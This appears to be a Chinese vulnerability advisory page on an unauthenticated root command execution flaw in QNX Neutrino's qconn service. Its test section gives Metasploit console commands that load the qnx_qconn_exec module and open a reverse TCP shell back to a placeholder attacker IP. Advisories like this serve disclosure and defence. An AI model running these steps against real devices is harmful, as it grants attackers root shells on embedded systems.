Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / QNX QCONN远程命令执行漏洞

发布日期:2012-10-15
更新日期:2012-10-18受影响系统:
QNX QCONN
描述:
--------------------------------------------------------------------------------
QNX Neutrino 实时操作系统是一种功能全面、运行稳健的操作系统,它的模块能灵活增减,以满足实时嵌入式系统资源有限的要求。QNX Neutrino的qconn组件内存在安全漏洞,可被利用允许未经过身份验证的用户以root用户执行任意命令。<*来源:David Odell
 
  链接:http://www.metasploit.com/modules/exploit/unix/misc/qnx_qconn_exec
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!$ msfconsole                ##                          ###         ##    ##
##  ##  #### ###### ####  ##### #####    ##    ####        ######
####### ##  ##  ##  ##       ## ##  ##    ## ##  ## ### ##
####### ######  ##  ##### ####  ##  ##    ## ##  ## ##    ##
## # ##   ##  ##  ##  ## ##      #####    ## ##  ## ##    ##
## ##  #### ### ##### #####   ## #### #### #### ###
                                      ##msf > use exploit/unix/misc/qnx_qconn_exec
msf exploit(qnx_qconn_exec) > show payloads
msf exploit(qnx_qconn_exec) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(qnx_qconn_exec) > set LHOST [MY IP ADDRESS]
msf exploit(qnx_qconn_exec) > set RHOST [TARGET IP]
msf exploit(qnx_qconn_exec) > exploit建议:
--------------------------------------------------------------------------------
厂商补丁:QNX
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.qnx.com/Nginx “location”受限制资源服务漏洞PhpTax 0.8及之前版本远程代码执行漏洞相关资讯      QNX Neutrino  远程命令执行漏洞  QNX Neutrino安全漏洞 
  • Smartphone Pentest Framework多个  (12/12/2012 09:00:06)
  • Cisco WAG120N多个远程命令执行漏  (11/24/2012 11:44:52)
  • Toshiba ConfigFree "CF7"文件远程  (09/25/2012 06:38:48)
  • Narcissus远程命令执行漏洞  (12/04/2012 06:52:44)
  • Webmin /file/show.cgi远程命令执  (10/24/2012 11:53:43)
  • GIMP远程命令执行漏洞  (08/21/2012 06:33:42)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款